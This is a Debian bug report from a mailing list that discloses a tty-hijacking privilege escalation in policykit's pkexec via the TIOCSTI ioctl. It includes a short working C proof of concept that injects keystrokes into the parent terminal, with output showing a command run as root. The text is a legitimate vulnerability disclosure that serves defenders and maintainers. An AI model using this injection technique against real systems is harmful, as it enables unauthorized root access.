[Pkg-utopia-maintainers] Bug#812512: pkexec tty hijacking via TIOCSTI ioctl

up201407890 at alunos.dcc.fc.up.pt up201407890 at alunos.dcc.fc.up.pt
Sun Jan 24 15:08:57 UTC 2016


Package: policykit-1
Version: all
Severity: important
File: /usr/bin/pkexec

When executing a program via "pkexec --user nonpriv program" the  
nonpriv session can escape to the parent session by using the TIOCSTI  
ioctl to push characters into the terminal's input buffer, allowing  
privilege escalation.
This issue has been fixed in "su" CVE-2005-4890 by calling setsid()  
and in "sudo" by using the "use_pty" flag.

$ cat test.c
#include <sys/ioctl.h>

int main()
{
  char *cmd = "id\n";
  while(*cmd)
   ioctl(0, TIOCSTI, cmd++);
}

$ gcc test.c -o test
$ id
uid=1000(saken) gid=1000(saken) groups=1000(saken)

# pkexec --user saken ./test ----> last command i type in
id
# id ----> did not type this
uid=0(root) gid=0(root) groups=0(root)


I don't believe any of the previous mentions of fixes for "su" and  
"sudo" work here, since executing a shell via pkexec would make it not  
have job control.

I'm also requesting a CVE for this issue

Thanks,
Federico Bento

----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.



More information about the Pkg-utopia-maintainers mailing list